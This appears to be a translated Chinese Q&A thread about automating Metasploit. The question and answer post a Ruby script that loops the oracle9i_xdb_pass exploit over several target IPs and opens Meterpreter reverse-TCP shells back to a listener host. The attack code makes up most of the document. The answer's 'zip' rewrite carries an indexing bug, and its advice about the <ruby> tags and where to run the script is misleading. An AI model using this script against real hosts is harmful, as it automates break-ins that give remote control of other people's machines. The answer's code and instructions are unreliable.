我一直在尝试自动化Metasploit,但找不到成功。
我希望主机的文本文件经历相同的漏洞利用(“oracle9i_xdb_pass”),并使用相同的选项。
这是我的代码:
<ruby>
lports = ["80","443","445"]
index = 0;
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.each do |target|
run_single("use exploit/windows/http/oracle9i_xdb_pass")
run_single("set LHOST 192.168.2.7")
run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
run_single("set LPORT #{lports[index]}")
run_single("set RHOST #{target}")
run_single("set ExitOnSession false")
run_single("exploit -j -z")
index = index + 1
end
</ruby>
问题是,当我使用ruby xploit.rb运行此程序时,我收到此错误:
ruby exploit.rb
exploit.rb:1: syntax error, unexpected '<'
<ruby>
^
exploit.rb:15: syntax error, unexpected '<', expecting end-of-input
</ruby>
答案 0 :(得分:1)
我不知道您在代码中使用<ruby>标记的想法,但它们不是Ruby中的东西。删除它们会为您提供有效的Ruby脚本:
lports = ["80","443","445"]
index = 0;
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.each do |target|
run_single("use exploit/windows/http/oracle9i_xdb_pass")
run_single("set LHOST 192.168.2.7")
run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
run_single("set LPORT #{lports[index]}")
run_single("set RHOST #{target}")
run_single("set ExitOnSession false")
run_single("exploit -j -z")
index = index + 1
end
虽然应该运行,但一个巧妙的Ruby技巧就是这样做:
lports = ["80","443","445"]
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.zip(lports).each do |target, lport|
run_single("use exploit/windows/http/oracle9i_xdb_pass")
run_single("set LHOST 192.168.2.7")
run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
run_single("set LPORT #{lports[lport]}")
run_single("set RHOST #{target}")
run_single("set ExitOnSession false")
run_single("exploit -j -z")
end
使用zip将数组合并在一起,这样您就可以同时迭代它们,无需索引变量,然后您需要做的就是运行脚本。
我不认为ruby exploit.rb将起作用,因为您使用了特殊的metasploit功能。您需要打开一个meterpreter shell并运行:
> run exploit
为此,您的漏洞需要保存在正确的文件夹中。在Linux上,它将是:
/usr/share/metasploit-framework/scripts/meterpreter/exploit.rb